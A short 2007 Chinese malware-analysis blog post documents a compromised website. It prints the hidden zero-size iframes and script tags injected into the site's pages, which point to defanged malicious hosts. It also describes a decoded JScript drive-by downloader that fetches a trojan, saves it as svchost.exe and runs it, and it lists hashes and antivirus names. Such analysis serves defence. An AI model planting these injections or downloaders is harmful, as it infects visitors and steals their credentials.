endurer 原创
2007-02-28 第1版
该网站的网页末被加入代码:
/------
<iframe src=hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm width=0 height=0></iframe>
<iframe src=hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/kh0.htm width=0 height=0></iframe><script language=javascript src=hxxp://yu***s*ahi.com/js/test.js></script>
------/
hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm
的内容为JavaScript脚本程序,用String.fromCharCode解密变量t的值并输出。
解出的变量t的值为jscript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 she.exe,保存为 %temp%/svchost.exe和%temp%/svchost.vbs,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
文件说明符 : d:/test/she.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-2-28 12:40:25
修改时间 : 2007-2-28 12:40:26
访问时间 : 2007-2-28 0:0:0
大小 : 21096 字节 20.616 KB
MD5 : 1fdbf69232ca57bd9f25116def0b622b
瑞星报为:Trojan.DL.Direct.et
| Scanned file: she.exe - Infected |
she.exe - infected by Trojan-Downloader.Win32.Small.dzu Statistics:
she.exe中包含信息: 文件说明符 : d:/test/js.exe 瑞星报为:Trojan.DL.Inject.sh |
| Scanned file: js.exe - Infected |
js.exe - infected by Trojan-PSW.Win32.QQRob.lp Statistics:
|
hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/kh0.htm
找不到网页。
hxxp://yu***s*ahi.com/js/test.js
的内容为:
/------
document.write("<iframe <iframe src=hxxp://yu***s*ahi.com/js/sas.htm width=0 height=0></iframe>")
document.write("<iframe <iframe src=hxxp://yu***s*ahi.com/js/zj.htm width=0 height=0></iframe>")
------/
hxxp://yu***s*ahi.com/js/sas.htm
内容与hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm相同。
hxxp://yu***s*ahi.com/js/zj.htm
找不到网页。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
